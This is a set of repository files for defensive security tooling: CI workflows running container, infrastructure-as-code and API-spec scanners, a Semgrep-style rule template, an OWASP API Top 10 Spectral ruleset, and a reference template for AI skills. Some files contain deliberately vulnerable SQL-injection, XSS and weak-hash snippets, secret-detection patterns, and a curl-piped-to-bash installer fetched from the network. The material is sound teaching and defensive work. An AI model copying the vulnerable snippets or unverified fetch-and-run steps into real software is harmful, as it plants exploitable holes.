# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
mkdir -p ${{ env.REPORT_DIR }}
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
{
echo "# Security Scan Summary"
echo "**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")"
echo "**Commit**: ${{ github.sha }}"
echo "**Branch**: ${{ github.ref_name }}"
} > consolidated-report/security-summary.md
cat >> consolidated-report/security-summary.md << 'EOF'
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,189 @@
# GitHub Actions Workflow for Spectral API Security Linting
# This workflow validates OpenAPI/AsyncAPI specifications against security best practices
name: API Security Linting with Spectral
on:
push:
branches: [main, develop]
paths:
- 'api-specs/**/*.yaml'
- 'api-specs/**/*.yml'
- 'api-specs/**/*.json'
- '.spectral.yaml'
pull_request:
branches: [main, develop]
paths:
- 'api-specs/**/*.yaml'
- 'api-specs/**/*.yml'
- 'api-specs/**/*.json'
- '.spectral.yaml'
jobs:
spectral-lint:
name: Lint API Specifications
runs-on: ubuntu-latest
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Setup Node.js
uses: actions/setup-node@v4
with:
node-version: '20'
cache: 'npm'
- name: Install Spectral CLI
run: npm install -g @stoplight/spectral-cli
- name: Verify Spectral Installation
run: spectral --version
- name: Lint API Specifications (GitHub Actions Format)
run: |
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset .spectral.yaml \
--format github-actions \
--fail-severity error
continue-on-error: true
- name: Generate JSON Report
if: always()
run: |
mkdir -p reports
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset .spectral.yaml \
--format json \
--output reports/spectral-results.json || true
- name: Generate HTML Report
if: always()
run: |
# Download parse script if not in repository
if [ ! -f "scripts/parse_spectral_results.py" ]; then
mkdir -p scripts
curl -o scripts/parse_spectral_results.py \
https://raw.githubusercontent.com/SecOpsAgentKit/skills/main/appsec/api-spectral/scripts/parse_spectral_results.py
chmod +x scripts/parse_spectral_results.py
fi
python3 scripts/parse_spectral_results.py \
--input reports/spectral-results.json \
--output reports/spectral-report.html \
--format html \
--map-owasp
- name: Upload Spectral Reports
if: always()
uses: actions/upload-artifact@v4
with:
name: spectral-security-reports
path: reports/
retention-days: 30
- name: Check for Critical Issues
run: |
if [ -f "reports/spectral-results.json" ]; then
CRITICAL_COUNT=$(jq '[.[] | select(.severity == 0)] | length' reports/spectral-results.json)
echo "Critical security issues found: $CRITICAL_COUNT"
if [ "$CRITICAL_COUNT" -gt 0 ]; then
echo "::error::Found $CRITICAL_COUNT critical security issues in API specifications"
exit 1
fi
fi
- name: Comment PR with Results
if: github.event_name == 'pull_request' && always()
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
if (fs.existsSync('reports/spectral-results.json')) {
const results = JSON.parse(fs.readFileSync('reports/spectral-results.json', 'utf8'));
const severityCounts = results.reduce((acc, finding) => {
const severity = ['error', 'warn', 'info', 'hint'][finding.severity] || 'unknown';
acc[severity] = (acc[severity] || 0) + 1;
return acc;
}, {});
const errorCount = severityCounts.error || 0;
const warnCount = severityCounts.warn || 0;
const infoCount = severityCounts.info || 0;
const summary = `## 🔒 API Security Lint Results
**Total Findings:** ${results.length}
| Severity | Count |
|----------|-------|
| 🔴 Error | ${errorCount} |
| 🟡 Warning | ${warnCount} |
| 🔵 Info | ${infoCount} |
${errorCount > 0 ? '⚠️ **Action Required:** Fix error-level security issues before merging.' : '✅ No critical security issues found.'}
📄 [View Detailed Report](../actions/runs/${context.runId})
`;
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: summary
});
}
# Optional: Separate job for OWASP-specific validation
owasp-validation:
name: OWASP API Security Validation
runs-on: ubuntu-latest
needs: spectral-lint
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Setup Node.js
uses: actions/setup-node@v4
with:
node-version: '20'
- name: Install Spectral CLI
run: npm install -g @stoplight/spectral-cli
- name: Validate Against OWASP Ruleset
run: |
# Use OWASP-specific ruleset if available
if [ -f ".spectral-owasp.yaml" ]; then
RULESET=".spectral-owasp.yaml"
else
# Download OWASP ruleset template
curl -o .spectral-owasp.yaml \
https://raw.githubusercontent.com/SecOpsAgentKit/skills/main/appsec/api-spectral/assets/spectral-owasp.yaml
RULESET=".spectral-owasp.yaml"
fi
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset "$RULESET" \
--format stylish \
--fail-severity warn
- name: Generate OWASP Compliance Report
if: always()
run: |
mkdir -p reports
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset .spectral-owasp.yaml \
--format json \
--output reports/owasp-validation.json || true
- name: Upload OWASP Report
if: always()
uses: actions/upload-artifact@v4
with:
name: owasp-compliance-report
path: reports/owasp-validation.json
retention-days: 30

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,293 @@
# Comprehensive OWASP API Security Top 10 2023 Spectral Ruleset
# This ruleset enforces OWASP API Security best practices for OpenAPI specifications
extends: ["spectral:oas"]
rules:
# ============================================================================
# API1:2023 - Broken Object Level Authorization
# ============================================================================
operation-security-defined:
description: All operations must have security requirements defined (OWASP API1)
severity: error
given: $.paths[*][get,post,put,patch,delete,head]
then:
- field: security
function: truthy
message: "Operations must define security requirements to prevent unauthorized object access (OWASP API1:2023 - Broken Object Level Authorization)"
id-parameters-require-security:
description: Operations with ID parameters must have security defined
severity: error
given: $.paths[?(@property =~ /(\/\{id\}|\/\{.*[_-]id\})/i)][get,put,patch,delete]
then:
- field: security
function: truthy
message: "Operations with ID parameters require security to prevent IDOR vulnerabilities (OWASP API1:2023)"
# ============================================================================
# API2:2023 - Broken Authentication
# ============================================================================
security-schemes-required:
description: API must define security schemes (OWASP API2)
severity: error
given: $.components
then:
- field: securitySchemes
function: truthy
message: "API must define security schemes to prevent authentication bypass (OWASP API2:2023 - Broken Authentication)"
no-http-basic-auth:
description: HTTP Basic authentication is insecure for APIs
severity: error
given: $.components.securitySchemes[*]
then:
- field: scheme
function: pattern
functionOptions:
notMatch: "^basic$"
message: "HTTP Basic authentication transmits credentials in plain text - use OAuth2, API key, or JWT (OWASP API2:2023)"
bearer-format-specified:
description: Bearer authentication should specify token format (JWT recommended)
severity: warn
given: $.components.securitySchemes[?(@.type == 'http' && @.scheme == 'bearer')]
then:
- field: bearerFormat
function: truthy
message: "Bearer authentication should specify token format (bearerFormat: JWT) for clarity (OWASP API2:2023)"
# ============================================================================
# API3:2023 - Broken Object Property Level Authorization
# ============================================================================
no-additional-properties:
description: Prevent mass assignment by disabling additionalProperties
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
- field: additionalProperties
function: falsy
message: "Set additionalProperties to false to prevent mass assignment vulnerabilities (OWASP API3:2023 - Broken Object Property Level Authorization)"
schemas-have-properties:
description: Object schemas should explicitly define properties
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
- field: properties
function: truthy
message: "Explicitly define object properties to control data exposure (OWASP API3:2023)"
# ============================================================================
# API4:2023 - Unrestricted Resource Consumption
# ============================================================================
rate-limit-headers-documented:
description: API should document rate limiting headers
severity: warn
given: $.paths[*][get,post,put,patch,delete].responses[?(@property < '300')].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-RateLimit-Limit]
- required: [X-Rate-Limit-Limit]
- required: [RateLimit-Limit]
message: "Document rate limiting headers to communicate resource consumption limits (OWASP API4:2023 - Unrestricted Resource Consumption)"
pagination-parameters-present:
description: List operations should support pagination
severity: warn
given: $.paths[*].get
then:
- field: parameters
function: schema
functionOptions:
schema:
type: array
contains:
anyOf:
- properties:
name:
enum: [limit, per_page, page_size]
- properties:
name:
enum: [offset, page, cursor]
message: "List operations should support pagination (limit/offset or cursor) to prevent resource exhaustion (OWASP API4:2023)"
# ============================================================================
# API5:2023 - Broken Function Level Authorization
# ============================================================================
write-operations-require-security:
description: Write operations must have security requirements
severity: error
given: $.paths[*][post,put,patch,delete]
then:
- field: security
function: truthy
message: "Write operations must have security requirements to prevent unauthorized function access (OWASP API5:2023 - Broken Function Level Authorization)"
admin-paths-require-security:
description: Admin endpoints must have strict security
severity: error
given: $.paths[?(@property =~ /admin/i)][*]
then:
- field: security
function: truthy
message: "Admin endpoints require security requirements with appropriate scopes (OWASP API5:2023)"
# ============================================================================
# API7:2023 - Server Side Request Forgery
# ============================================================================
no-url-parameters:
description: Avoid URL parameters to prevent SSRF attacks
severity: warn
given: $.paths[*][*].parameters[?(@.in == 'query' || @.in == 'body')][?(@.name =~ /(url|uri|link|callback|redirect|webhook)/i)]
then:
function: truthy
message: "URL parameters can enable SSRF attacks - validate and whitelist destination URLs (OWASP API7:2023 - Server Side Request Forgery)"
# ============================================================================
# API8:2023 - Security Misconfiguration
# ============================================================================
servers-use-https:
description: All API servers must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URLs must use HTTPS protocol for secure communication (OWASP API8:2023 - Security Misconfiguration)"
no-example-servers:
description: Replace example server URLs with actual endpoints
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
notMatch: "example\\.com"
message: "Replace example.com with actual production server URLs (OWASP API8:2023)"
security-headers-in-responses:
description: Document security headers in responses
severity: info
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-Content-Type-Options]
- required: [X-Frame-Options]
- required: [Strict-Transport-Security]
- required: [Content-Security-Policy]
message: "Consider documenting security headers (X-Content-Type-Options, X-Frame-Options, HSTS, CSP) (OWASP API8:2023)"
# ============================================================================
# API9:2023 - Improper Inventory Management
# ============================================================================
api-version-required:
description: API specification must include version
severity: error
given: $.info
then:
- field: version
function: truthy
message: "API version must be specified for proper inventory management (OWASP API9:2023 - Improper Inventory Management)"
semantic-versioning-format:
description: Use semantic versioning for API versions
severity: warn
given: $.info.version
then:
function: pattern
functionOptions:
match: "^\\d+\\.\\d+(\\.\\d+)?$"
message: "Use semantic versioning format (MAJOR.MINOR.PATCH) for API versions (OWASP API9:2023)"
contact-info-required:
description: API must include contact information
severity: warn
given: $.info
then:
- field: contact
function: truthy
message: "Include contact information for API support and security reporting (OWASP API9:2023)"
deprecated-endpoints-documented:
description: Deprecated endpoints must document migration path
severity: warn
given: $.paths[*][*][?(@.deprecated == true)]
then:
- field: description
function: pattern
functionOptions:
match: "(deprecate|migrate|alternative|replacement|use instead)"
message: "Deprecated endpoints must document migration path and timeline (OWASP API9:2023)"
# ============================================================================
# API10:2023 - Unsafe Consumption of APIs
# ============================================================================
validate-external-api-responses:
description: Document validation of external API responses
severity: info
given: $.paths[*][*].responses[*].content[*].schema
then:
- field: description
function: truthy
message: "Document schema validation for all API responses, especially from external APIs (OWASP API10:2023 - Unsafe Consumption of APIs)"
# ============================================================================
# Additional Security Best Practices
# ============================================================================
no-pii-in-query-parameters:
description: Prevent PII exposure in URL query parameters
severity: error
given: $.paths[*][*].parameters[?(@.in == 'query')].name
then:
function: pattern
functionOptions:
notMatch: "(?i)(ssn|social.?security|credit.?card|password|secret|token|api.?key|private|passport|driver.?license)"
message: "Query parameters must not contain PII or sensitive data - use request body with HTTPS instead"
consistent-error-response-format:
description: Error responses should follow consistent format
severity: warn
given: $.paths[*][*].responses[?(@property >= '400')].content.application/json.schema
then:
function: schema
functionOptions:
schema:
type: object
required: [error, message]
message: "Error responses should follow consistent format with 'error' and 'message' fields"
no-verbose-error-details:
description: 5xx errors should not expose internal details
severity: warn
given: $.paths[*][*].responses[?(@property >= '500')].content[*].schema.properties
then:
function: schema
functionOptions:
schema:
type: object
not:
anyOf:
- required: [stack_trace]
- required: [stackTrace]
- required: [debug_info]
message: "5xx error responses should not expose stack traces or internal details in production"

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
// - Direct DOM manipulation (innerHTML, document.write)
// - React dangerouslySetInnerHTML with user data
// - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
